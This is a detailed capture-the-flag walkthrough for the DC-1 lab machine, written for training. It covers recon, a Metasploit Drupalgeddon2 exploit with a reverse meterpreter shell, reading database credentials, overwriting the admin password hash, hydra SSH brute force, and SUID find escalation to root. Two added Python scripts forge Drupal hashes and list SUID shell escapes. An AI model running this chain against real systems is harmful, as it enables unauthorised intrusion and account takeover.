DC-1 Lab Penetration Walkthrough (Very Detailed)

Target machine page

Information Gathering

  • Find DC-1's IP address

    Look up DC-1's MAC address (00:0C:29:60:07:4F), then sweep the subnet with nmap for live hosts: the host with that MAC is 192.168.175.148, so that is the target.

  • The target's web page

  • Scan DC-1's open ports

    ┌──(kali💋kali)-[~]
    └─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.148
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-30 10:57 EDT
    Nmap scan report for 192.168.175.148
    Host is up (0.0012s latency).
    Not shown: 65531 closed ports
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
    |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
    |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
    80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
    |_http-generator: Drupal 7 (http://drupal.org)
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
    |_/LICENSE.txt /MAINTAINERS.txt
    |_http-server-header: Apache/2.2.22 (Debian)
    |_http-title: Welcome to Drupal Site | Drupal Site
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100024  1          41137/udp   status
    |   100024  1          44638/tcp   status
    |   100024  1          46632/udp6  status
    |_  100024  1          53040/tcp6  status
    44638/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:60:07:4F (VMware)
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.2 - 3.16
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT     ADDRESS
    1   1.16 ms 192.168.175.148

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

    Port   State  Service  Version
    22     open   ssh      OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
    80     open   http     Apache httpd 2.2.22 ((Debian))
    111    open   rpcbind  2-4 (RPC #100000)
    44638  open   status   1 (RPC #100024)
  • Web application fingerprint

    OS            Linux 3.x
    Server        Apache/2.2.22 (Debian)
    X-Powered-By  PHP/5.4.45-0+deb7u14

    The generator header and robots.txt show the site runs on Drupal 7, so we scan it with droopescan, a scanner built specifically for Drupal and similar CMSes.

  • droopescan scan

    ┌──(kali💋kali)-[~/tools/droopescan]
    └─$ ./droopescan scan drupal -u http://192.168.175.148
    [+] Plugins found:                                                              
        ctools http://192.168.175.148/sites/all/modules/ctools/
            http://192.168.175.148/sites/all/modules/ctools/LICENSE.txt
            http://192.168.175.148/sites/all/modules/ctools/API.txt
        views http://192.168.175.148/sites/all/modules/views/
            http://192.168.175.148/sites/all/modules/views/README.txt
            http://192.168.175.148/sites/all/modules/views/LICENSE.txt
        profile http://192.168.175.148/modules/profile/
        php http://192.168.175.148/modules/php/
        image http://192.168.175.148/modules/image/

    [+] Themes found:
        seven http://192.168.175.148/themes/seven/
        garland http://192.168.175.148/themes/garland/

    [+] Possible version(s):
        7.22
        7.23
        7.24
        7.25
        7.26

    [+] Possible interesting urls found:
        Default admin - http://192.168.175.148/user/login

    [+] Scan finished (0:08:14.470190 elapsed)

  • Vulnerability scan report

    The scanner reports the following findings, among them CVE-2014-3704 and CVE-2018-7600. Both fit the 7.22-7.26 version range droopescan estimated: CVE-2014-3704 (Drupalgeddon) affects Drupal 7.x before 7.32 and CVE-2018-7600 (Drupalgeddon2) affects 7.x before 7.58.

    No.  Finding
    1    Drupal Core SQL Injection Vulnerability (CVE-2014-3704)
    2    Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check) (CVE-2018-7600)
    3    Sensitive File Disclosure (HTTP)
    4    Cleartext Transmission of Sensitive Information via HTTP
    5    SSH Weak Encryption Algorithms Supported

Exploitation

  • CVE-2018-7600

    The remote code execution bug can be exploited by hand to get a shell, or directly through Metasploit; here we let MSF do the work.

    In msfconsole, search drupal lists the Drupal exploit modules.

    We want the 2018 CVE (Drupalgeddon2). In this session it was entry 1 in the search results, so use 1 loads it. Search indices shift between Metasploit versions, so use exploit/unix/webapp/drupal_drupalgeddon2 (the module name shown in the prompt below) is the form that always works.

    msf6 > use 1
    [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

    Module options (exploit/unix/webapp/drupal_drupalgeddon2):

       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       DUMP_OUTPUT  false            no        Dump payload command output
       PHP_FUNC     passthru         yes       PHP function to execute
       Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        80               yes       The target port (TCP)
       SSL          false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI    /                yes       Path to Drupal install
       VHOST                         no        HTTP server virtual host


    Payload options (php/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic (PHP In-Memory)


    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.175.148
    rhosts => 192.168.175.148
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

    Module options (exploit/unix/webapp/drupal_drupalgeddon2):

       Name         Current Setting  Required  Description
       ----         ---------------  --------  -----------
       DUMP_OUTPUT  false            no        Dump payload command output
       PHP_FUNC     passthru         yes       PHP function to execute
       Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS       192.168.175.148  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        80               yes       The target port (TCP)
       SSL          false            no        Negotiate SSL/TLS for outgoing connections
       TARGETURI    /                yes       Path to Drupal install
       VHOST                         no        HTTP server virtual host


    Payload options (php/meterpreter/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic (PHP In-Memory)


    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

    [*] Started reverse TCP handler on 192.168.175.144:4444 
    [*] Executing automatic check (disable AutoCheck to override)
    [!] The service is running, but could not be validated.
    [*] Sending stage (39282 bytes) to 192.168.175.148
    [*] Meterpreter session 1 opened (192.168.175.144:4444 -> 192.168.175.148:33015) at 2023-03-30 12:09:16 -0400

    Shell obtained.

    Drop from meterpreter to a system shell with the shell command, then upgrade it to a proper TTY; this is far more stable than the raw shell:

    python -c 'import pty; pty.spawn("/bin/bash")'

Next, look around the web root: there is a flag1.txt.

Read flag1.txt:

Every good CMS needs a config file - and so do you.

The hint points at Drupal's configuration file. For Drupal 7 that is settings.php, located at sites/default/settings.php under the web root.

settings.php contains flag2 and the database credentials: database drupaldb, user dbuser, password R0ck3t.

www-data@DC-1:/var/www/sites/default$ cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);


Now connect to the database with the recovered credentials (the host is localhost, so this is run from the www-data shell on the target):

mysql -udbuser -pR0ck3t

Listing the databases confirms drupaldb exists.

Inside drupaldb there is a users table, the obvious place for account names and passwords.

It does contain an account named admin, but its password is stored as a salted hash and cannot be used as-is. Since these credentials give us write access to the database, we can instead overwrite the hash with one for a password we know, via an UPDATE.

Drupal 7 ships scripts/password-hash.sh (run as php scripts/password-hash.sh <password> from the Drupal root) to generate such hashes; see the referenced article.

update users set pass="$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H";   #overwrites the pass value of every row in users with this hash, which is the Drupal hash of "admin" (a hash is not decoded; at login Drupal re-hashes the supplied password and compares). Add where name='admin' to change only the admin account.
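Before pasting a hash someone else produced into the database, it helps to be able to generate and verify Drupal 7 hashes yourself. The following is an added example written for this walkthrough, not Drupal's code and not part of the original post: a Python re-implementation of the $S$ scheme from Drupal 7's includes/password.inc (an 8-character salt, SHA-512 iterated 2^15 times by default, phpass-style base64, truncated to 55 characters). With it you can mint a hash for any password without running php scripts/password-hash.sh on the target, and check whether the hash above really corresponds to "admin" before relying on it. The hash constant and the salt tiZnUFHD come from the UPDATE statement above; everything else is the example's own.

```python
#!/usr/bin/env python3
"""Drupal 7 '$S$' password hashes, re-implemented in Python.

Added example for this walkthrough; not Drupal's code. It follows the algorithm
of _password_crypt() / user_hash_password() in Drupal 7's includes/password.inc:
  setting = '$S$' + log2(rounds) as one ITOA64 char + 8-char salt   (12 chars)
  digest  = sha512(salt + pw), then sha512(digest + pw) repeated 2**log2 times
  hash    = (setting + phpass_base64(digest))[:55]
"""
import hashlib
import math
import os
from typing import Dict, Optional

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
DRUPAL_HASH_COUNT = 15      # Drupal 7 default: 2**15 = 32768 rounds
DRUPAL_HASH_LENGTH = 55     # stored hashes are cut to 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30  # Drupal rejects settings outside this range


def _b64_encode(data: bytes) -> str:
    """phpass-style base64: little-endian groups of 3 bytes, ITOA64 alphabet."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return ''.join(out)


def _crypt(password: str, setting: str) -> Optional[str]:
    """Recompute the hash for `password` under the 12-char `setting` taken from
    an existing hash. Returns None for malformed settings, as Drupal does."""
    pw = password.encode('utf-8')
    if len(pw) > 512:                      # Drupal's DoS guard
        return None
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt = setting[4:12].encode('utf-8')
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):       # PHP: do { ... } while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    output = setting + _b64_encode(digest)
    if len(output) != 12 + math.ceil(8 * len(digest) / 6):
        return None
    return output[:DRUPAL_HASH_LENGTH]


def parse_setting(stored: str) -> Dict[str, object]:
    """Split a stored $S$ hash into its parameters (handy when triaging a dump)."""
    log2 = ITOA64.find(stored[3])
    return {'count_log2': log2, 'rounds': 1 << log2, 'salt': stored[4:12]}


def drupal7_hash(password: str, salt: Optional[str] = None,
                 count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """Produce a fresh hash, as scripts/password-hash.sh would. The salt is 8
    ITOA64 chars; a random one is drawn unless given (a fixed salt makes the
    output reproducible for testing, never do that for real accounts)."""
    if salt is None:
        salt = _b64_encode(os.urandom(6))
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError('salt must be 8 ITOA64 characters')
    hashed = _crypt(password, '$S$' + ITOA64[count_log2] + salt)
    if hashed is None:
        raise ValueError('invalid hash parameters')
    return hashed


def drupal7_check(password: str, stored: str) -> bool:
    """What Drupal does at login for $S$ hashes: re-hash with the stored
    setting and compare. The hash is never 'decoded'."""
    if not stored.startswith('$S$'):
        return False
    return _crypt(password, stored) == stored


if __name__ == '__main__':
    # Hash from the UPDATE statement above; the writeup says it is "admin".
    PAGE_HASH = '$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H'
    print(parse_setting(PAGE_HASH))
    print('page hash verifies as "admin":', drupal7_check('admin', PAGE_HASH))
    # Paste into: update users set pass='...' where name='admin';
    print('fresh hash for admin:', drupal7_hash('admin'))
```

Two practical points: Drupal's own password-hash.sh draws a random salt, so two runs never print the same hash for the same password, which is why hashes in different writeups differ; and because the stored hash carries its own setting, drupal7_check() works on any row pulled from the users table, so you can test a guessed password against the admin hash offline instead of overwriting it.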

We can now log in to the site as admin with that password.

Browsing the site's content after logging in turns up flag3:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Looking in /home then turns up flag4:

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

flag4 itself gives no direct lead, but flag3 mentions "special PERMS" and "shadow". Reading /etc/shadow fails for lack of permission, while /etc/passwd is readable and lists a user named flag4. Recon showed port 22 open, so the next step is to recover flag4's password and log in over SSH.

SSH password brute force

We use hydra for this.

The password list used:

hydra ssh://192.168.175.148 -l flag4 -P /usr/share/john/password.lst -vV -f -t 64

#-vV  show every attempt as it is made
#-f   stop as soon as a valid login is found
#-t   number of parallel connections (hydra itself warns that SSH servers tend to drop connections above 4 tasks; lower -t if you see connection errors)

hydra recovers flag4's password: orange. Log in over SSH as flag4 and try /etc/shadow again; it is still unreadable, so flag4 is an unprivileged user and we need to escalate privileges.

Privilege Escalation

Goal: root.

Escalation approaches

  • Kernel exploit

  • sudo misconfiguration (check with sudo -l)

  • SUID binaries

flag3 hinted at PERMS, so the SUID route is the one to take here.

What is SUID privilege escalation?

A file with the SUID bit set runs with the effective UID of its owner rather than of the user who launched it, so a root-owned SUID find runs as root for anyone who invokes it. If such a program can launch other commands (find's -exec does exactly that), the child process inherits the root effective UID as well. Trust is transitive: root trusts find, find trusts whatever -exec runs, so whatever -exec runs ends up with root's privileges.

Find files with the SUID bit set:

find / -perm -4000 2>/dev/null

The root-owned find binary is among them, so we use it to escalate.

Create an empty directory for find to match, then have find spawn a shell:

mkdir tacoking
find tacoking -exec /bin/sh \;   #-exec runs a command for each path find matches; tacoking is empty, so find matches only the directory itself and spawns exactly one shell. find runs with root's effective UID, so the /bin/sh it launches has it too. /bin/sh here is dash, which keeps the elevated effective UID; bash would drop it unless started with -p.

id in the new shell shows euid=0. Change to /root: it contains thefinalflag.txt, the final flag.
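As an added example (not from the original writeup), here is a Python equivalent of the two steps above: enumerate setuid files the way find / -perm -4000 2>/dev/null does, then flag the ones whose SUID bit is commonly abusable. Python is already on the target (it was used for the PTY earlier), so this also works where find is missing or not SUID. The hit-list and its notes are the example's own, taken from widely documented GTFOBins entries rather than from this page, and make_fixture() builds a throwaway directory with fake SUID files so the code can be exercised without a root-owned binary.

```python
#!/usr/bin/env python3
"""Enumerate setuid binaries and triage them for shell escapes.

Added example for this walkthrough (not from the original post). find_suid()
does what `find / -perm -4000 -type f 2>/dev/null` does; triage() matches the
hits against SUID_ESCAPES, a list assumed here from public GTFOBins entries.
"""
import os
import stat
import sys
import tempfile
from typing import Dict, List

# basename -> how the binary yields a shell (or an arbitrary write) when SUID.
# /bin/sh is dash on Debian and keeps the elevated euid; bash drops it unless -p.
SUID_ESCAPES: Dict[str, str] = {
    'find':   "find <path> -exec /bin/sh \\; -quit",
    'vim':    ":!/bin/sh from inside vim",
    'nmap':   "nmap --interactive, then !sh (only nmap <= 5.21 has --interactive)",
    'env':    "env /bin/sh",
    'awk':    "awk 'BEGIN {system(\"/bin/sh\")}'",
    'perl':   "perl -e 'exec \"/bin/sh\"'",
    'python': "python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'",
    'less':   "!/bin/sh from inside less",
    'bash':   "bash -p",
    'cp':     "overwrite /etc/passwd with a copy that adds a uid 0 user",
}

PSEUDO_FS = ('/proc', '/sys', '/dev', '/run')  # never hold SUID binaries


def find_suid(root: str = '/') -> List[str]:
    """Return regular files under `root` with the setuid bit set, sorted.
    Unreadable directories are skipped (the 2>/dev/null of the find command)
    and symlinks are not followed, so a link to a SUID binary is reported only
    through its real path."""
    hits: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage(paths: List[str]) -> Dict[str, str]:
    """Keep the SUID files whose basename is a known escape, paired with the
    escape note; everything else is left for manual review."""
    return {p: SUID_ESCAPES[os.path.basename(p)]
            for p in paths if os.path.basename(p) in SUID_ESCAPES}


def describe(path: str) -> str:
    """One report line per file: octal mode, owner uid, path. A SUID hit only
    matters when the owner is uid 0 (or another account worth becoming)."""
    st = os.lstat(path)
    return '%o uid=%d %s' % (st.st_mode & 0o7777, st.st_uid, path)


def make_fixture() -> str:
    """Constructed test data: a throwaway tree with fake SUID files owned by the
    current user, so the scan can be tried without touching the real system.
    Returns the root of the tree."""
    root = tempfile.mkdtemp(prefix='suid-demo-')
    for rel, mode in (('usr/bin/find', 0o4755),    # the DC-1 escalation path
                      ('usr/bin/passwd', 0o4755),  # SUID, but no shell escape
                      ('bin/ls', 0o755),           # not SUID
                      ('usr/bin/vim', 0o4755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w'):
            pass
        os.chmod(path, mode)
    return root


if __name__ == '__main__':
    scan_root = sys.argv[1] if len(sys.argv) > 1 else '/'
    hits = find_suid(scan_root)
    for h in hits:
        print(describe(h))
    print('\ncandidates for a shell escape:')
    for path, note in triage(hits).items():
        print(' ', path, '->', note)
```

Run it as python3 suid_triage.py / on the target, or python3 suid_triage.py "$(python3 -c 'import suid_triage; print(suid_triage.make_fixture())')" to see the output on the constructed tree. The triage list is only a shortlist: a SUID binary not in it can still be dangerous (custom setuid helpers are a classic finding), and one that is in it is harmless unless its owner is an account you want to become.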

Tips

Because MSF was used to get the shell directly, the details of CVE-2014-3704 and CVE-2018-7600 are not covered here. Readers who are interested can refer to these two articles:

CVE-2014-3704

CVE-2018-7600
